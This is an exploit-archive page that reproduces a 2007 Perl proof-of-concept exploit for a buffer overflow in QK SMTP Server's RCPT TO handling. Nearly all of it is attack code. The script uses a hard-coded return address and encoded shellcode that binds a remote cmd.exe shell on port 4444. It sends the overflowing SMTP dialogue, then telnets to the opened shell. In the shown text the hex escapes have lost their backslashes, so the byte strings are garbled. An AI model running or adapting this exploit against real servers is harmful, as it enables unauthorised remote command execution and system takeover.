Home / exploitsPDF  

qksmtp.pl.txt

Posted on 02 January 2007

#!/bin/perl # #http://www.securityfocus.com/bid/20681 # # tested on winXp Pro SP0 English/winXp Pro SP2 Italian/win 2k SP4 Italian/English return address is universal # bind a remote cmd.exe on target host on 4444 port; based on expanders original exploit # credit to Greg Linares for discovered the vulnerability # thanks to hdm and vlads902 for original shellcode;encoded using Skylined alpha2 tool # Jacopo Cervini aka acaro [at] jervus.it if (@ARGV < 1) { print "-------------------------------------------------------------------- "; print "Usage : qksmtp-rcpt-overflow-4444.pl TargetIPAddress "; print " Example : ./qksmtp-rcpt-overflow-4444.pl 127.0.0.1 "; print "-------------------------------------------------------------------- "; } use IO::Socket::INET; my $host = shift(@ARGV); my $port = 25; my $reply; my $request; #my $eip="x43x43x43x43"; my $eip="x8fx29x46x00"; #call esp in QKSmtpServer3.exe $sc= "PPYAIAIAIAIAIAIAIAIAIAIAIAIAIAIAjXAQADAZABARALAYAIAQAIAQAIAhAAAZ1AIAIAJ11AIAIABABABQI1AIQIAIQI111AIAJQYAZ". "BABABABABkMAGB9u4JBYlQZjKNmiXkIyokOkOOptKplmTo4RkQ5oL2kCLm5PxkQJORkPOLX4KOoKpIqjKOYtKP4DKkQZNp1upryVLqtWP". "44LGWQgZjmjaXBJKL4MkntktnHt5IURkqOnDkQzKqVRkLLNkRkQOMLM1xkm3NLTKQyBLO4mLoqy3lqIK34rkmsLptKQ0LL4KppmL4mdKM". "pKXOnaX4N0NLNjLNpKOz6ovOcRFOxlsOBphSGRSoBaOOdkOXPRH8KjMKLOKpPkO6vQOTIXeOve1JMm8JbnuqZKRkOHPbH7izizUvMPWYo". "6vnsOcQCb3PSMsNsOSNskOfp1VqXLQ1LrFnsu99QTUQXTdMJ2PewqGkOVvqZZpnqPUkOXPph3tTmNNZINwKO6vns0UKO6pOxIUoYBfa9r". "7Yo6vb00TOdR5YoHP3cRHgwRYGVbYnwkOJ6OeyoJ0s60j1T36OxqSrMU9jEozPPPYNIxLQyzGrJmtriYRnQGPZSdjkNORlmynMrnL63Bm". "PznXvKFKVKqXPrKNvSMFyoD5Mtyo6vqKPWPRPQoaNqbJkQpQpQoepQKOfpOxtmz9m58NNsiovv2JYoyoLw9oVpDK27ilqsvds4KOWfpRk". "OvpOxhp1zitOonsKOyFKO6pA"; $jmpback = "x50x73". "x54x73". "x58x73". "xb0". "x48x73". "xb0x48x73". "xb0x48x73". "xb0x48x73". "xb0x48x73". "xb0x48x73". "xb0x48x73". "xb0x48x73". "xb0x48x73". "xb0x48x73". "xb0x48x73". "xb0x48x73". "xb0x48x73". "x40x73". "x40x73". "x40x73". "x40x73". "x40x73". "x40x73". "x40x73". "x50x73". "xc3x73"; my $buffer =("x41"x296).$eip.("x73"x2228).$sc.("x45"x820).$jmpback."x00"; my $socket = IO::Socket::INET->new(proto=>'tcp', PeerAddr=>$host, PeerPort=>$port); $socket or die "Cannot connect to host! "; recv($socket, $reply, 1024, 0); print "Response:" . $reply; $request = "helo acaro" . " "; send $socket, $request, 0; print "[+] Sent helo request "; recv($socket, $reply, 1024, 0); print "Response:" . $reply; sleep(1); $request = "mail from: acaro@peaceandlove.peace" . " "; send $socket, $request, 0; print "[+] Sent mail from request "; recv($socket, $reply, 1024, 0); print "Response:" . $reply; sleep(1); $request = "rcpt to: " . $buffer . " "; send $socket, $request, 0; print "[+] Sent rcpt to request "; print " + connect on 4444 port of $host ... "; sleep(3); system("telnet $host 4444"); exit;

 

TOP